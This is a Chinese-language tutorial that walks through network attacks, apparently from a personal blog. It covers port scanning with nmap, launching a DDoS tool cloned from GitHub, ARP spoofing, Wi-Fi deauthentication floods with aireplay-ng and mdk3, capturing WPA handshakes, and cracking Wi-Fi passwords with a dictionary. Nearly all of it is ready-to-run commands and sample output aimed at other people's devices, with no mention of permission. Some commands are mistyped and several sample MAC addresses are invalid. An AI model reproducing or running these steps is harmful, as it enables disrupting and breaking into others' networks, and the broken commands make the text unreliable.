少女祈祷中...

端口扫描

需要使用nmap工具

sudo nmap -sT -p- 192.168.8.51-sT 选项告诉 nmap扫描TCP端口, -p-扫描所有端口(65535个)

也可以指定端口

sudo nmap -sT -p 53 192.168.8.51

DDOS攻击

下载攻击工具: git clone https://github.com/Andysun06/ddos

进入工具文件夹

使用python3运行攻击工具,输入ip和端口就可以了

ARP欺骗攻击

apt-get install dsniff

使用ifconfig找到对应的网卡

然后嗅探你所在WLAN下所有设备的IP地址,命令如下:

1
fping -g 本机IP地址/24

先获得root权限,输入以下命令:

1
sudo su

然后输入以下命令:

1
arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址

取消认证攻击

安装aircrack-ng工具 apt install aircrack-ng

将网卡设置成监听模式**

1
2
3
sudo airmon-ng start 网卡名
#停止监听
sudo airmon-ng stop 网卡名

注意在开启监听后网卡名称可能会发生改变可使用ifconfig进行查看

探测周边无限信号

1
2
3
airodump-ng 网卡名 # 该方法只能探测2.4G平段

airodump-ng -C 5180-5885 wlp45s0mon # 该方法可探测5G平段

检查接入情况

确定要攻击的目标网路,可以输入下面命令观察目标网络及其连入客户端的情况:

1
2
airodump-ng -d AP的MAC地址 网卡名称 //随机信道
airodump-ng -c 1 -d AP的MAC地址 网卡名称 //-c 1 指定信道

发起攻击

1
aireplay-ng -0 1000 -a AP的MAC -c 目标的MAC -D 网卡名

比如:

1
aireplay-ng -0 1000 -a 04:F9:F8:C0:15:D9 -c 20:47:DA:AF:C4:3C -D wlp45s0mon

mdk3

将信息写入文件中

  1. echo AP的MAC地址 > blist.txt
    将要攻击的目标 AP 的 MAC 写到一个文件中。
  2. mdk3 网卡名称 d -c 1 -b blist.txt

破解密码

可先升级成root权限,方便后面操作sudo -i

将网卡设置为监听模式
sudo airmon-ng start 网卡名

注意在开启监听后网卡名称可能会发生改变可使用ifconfig进行查看

扫描wifi

1
airodump-ng 网卡名称
1
2
3
4
5
6
7
8
9
MAC地址          信号强度                           信道                                         wifi名称
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSI
14:AD:DA:99:6C:D6 -76 4 0 0 13 130 WPA2 CCMP PSK CMCC
8E:CE:4E:S1:A4:C0 -76 5 0 0 13 48 WPA2 CCMP PSK ZM44
DC:84:E9:C2:96:78 -69 4 0 0 6 360 WPA2 CCMP PSK GJH
CC:D8:43:A3:40:06 -72 3 0 0 6 130 WPA2 CCMP PSK AD
04:F9:F8:C4:15:D9 -49 11 4 1 6 540 WPA2 CCMP PSK SA
BC:46:99:SE:31:28 -77 7 0 0 6 270 WPA2 CCMP PSK TP-L
82:CD:F7:FK:A2:B6 -47 3 0 0 6 360 WPA2 CCMP PSK QZRL

抓握手包

1
airodump-ng -w freedom -c 信道 --bssid AP的MAC地址 网卡名称 -ignore-nefative-oneaa

会车后就会开始监听

在监听页面会显示在那个wifi下连接的用户,记住那个用户的MAC地址来进行下一步的操作

1
2
3
4
5
6
7
8
9
10
11
CH  6 ][ GPS  *** No Fix! ***              ][ Elapsed: 12 s ][ 2024-03-24 13:12 
信道
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

04:F9:F8:C7:12:D9 -43 23 106 40 1 6 540 WPA2 CCMP PSK wifi名

AP的MAC 连接者的MAC
BSSID STATION PWR Rate Lost Frames Notes Probes

04:F9:F8:C7:12:D9 E4:A3:E8:4E:E3:DA -46 1e- 5e 0 20
04:F9:F8:C7:12:D9 20:47:D5:AF:C1:3C -58 0 - 1e 0 11

进行取消认证攻a击让连接该wifi的用户断开连接

1
2
3
aireplay-ng -0 1000 -a AP的MAC -c 目标的MAC -D 网卡名

# aireplay-ng -0 1000 -a 04:F9:F8:C7:12:D9 -c 20:47:D5:AF:C1:3C -D wlp45s0mon

在执行了一会后按ctrl+cctrl+Z停止攻击,等待用户机重联

回到抓包的窗口查看,如果抓到了了握手包则在顶部会显示:

1
2
会显示这个
CH 6 ][ GPS *** No Fix! *** ][ Elapsed: 2 mins ][ 2024-03-24 13:22 ][ WPA handshake: 04:F9:F8:C7:12:D
1
在目录下会生成一个.ivs文件,然后找一个字典,等会跑字典
1
ircrack-ng -w 密码字典文件路径 ivs文件路径

如果成功了会显示

1
KEY FOUND [123456]

失败了(字典中没有)

1
KEY NOT FOUND